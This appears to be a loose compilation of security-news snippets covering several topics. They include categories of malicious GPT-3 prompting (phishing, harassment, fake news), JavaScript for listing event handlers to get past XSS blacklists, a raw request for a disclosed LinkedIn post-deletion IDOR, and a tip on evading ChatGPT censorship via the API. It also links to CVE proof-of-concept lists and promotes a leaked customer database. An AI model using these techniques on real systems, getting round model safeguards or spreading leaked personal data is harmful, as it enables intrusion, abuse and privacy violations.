Creatively malicious prompt engineering.pdf
Creatively malicious prompt engineering
Phishing content: Emails or messages designed to trick a user into opening a malicious attachment or visiting a malicious link
Social opposition: Social media messages designed to troll and harass individuals or to cause brand damage
Social validation: Social media messages designed to advertise or sell, or to legitimize a scam
Style transfer: A technique designed to coax the model into using a particular writing style
Opinion transfer: A technique designed to coax the model into writing about a subject in a deliberately opinionated way
Prompt creation: A way of asking the model to generate prompts based on content
Fake news: Research into how well GPT-3 can generate convincing fake news articles of events that weren’t part of its training set
https://www.perimeterx.com/tech-blog/2019/list-every-event-that-exists-in-the-browser/
The simplest way:
Object.getOwnPropertyNames(document).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document)))).filter(function(i){return !i.indexOf('on')&&(document[i]==null||typeof document[i]=='function');})
Like this:
Object.getOwnPropertyNames(document).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document)))).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(window))).filter(function(i){return !i.indexOf('on')&&(document[i]==null||typeof document[i]=='function');}).filter(function(elem, pos, self){return self.indexOf(elem) == pos;})
Or like this:
[...new Set([
  ...Object.getOwnPropertyNames(document),
  ...Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document))),
  ...Object.getOwnPropertyNames(Object.getPrototypeOf(window)),
].filter(k => k.startsWith("on") && (document[k] == null || typeof document[k] == "function")))];
This helps when exploiting XSS in cases where a service uses blacklists for certain event handlers.
Two weeks ago a vulnerability was disclosed that allowed deleting anyone else's post on LinkedIn.
POST /mwlite/feed/deletePost/?csrfToken=ajax:6083619284478736796 HTTP/1.1
Host: www.linkedin.com

{"objectUrn":"urn:li:activity:6390481093803499520"}
where objectUrn is the ID of someone else's post.
The IDOR was valued at $10,000.
https://github.com/quarkslab/pastis
The PASTIS project is a fuzzing framework that aims to combine various software testing techniques within the same workflow to perform collaborative fuzzing, also called ensemble fuzzing. At the moment it supports the following fuzzing engines:
— Honggfuzz (greybox fuzzer)
— AFL++ (greybox fuzzer)
— TritonDSE (whitebox fuzzer)
chatgpt-for-bugbounty-.pdf
Catching up
Bypassing ChatGPT censorship using API requests.
1. Install jq
2. Set the CHATGPT_TOKEN environment variable, taken from https://platform.openai.com/account/api-keys
3. Use it
A repository with a huge list of PoCs for many CVEs, starting from 2008: https://github.com/nomi-sec/PoC-in-GitHub.
It is populated automatically, and there is a separate site: https://poc-in-github.motikan2010.net/.
A leaked customer database of AlfaStrakhovanie. It is notable for containing many corporate accounts of "nanosecs" from Magnit, X5, Sber and other "top" companies. In total the leak has more than 1 million rows with full names, phone numbers, email addresses and password hashes.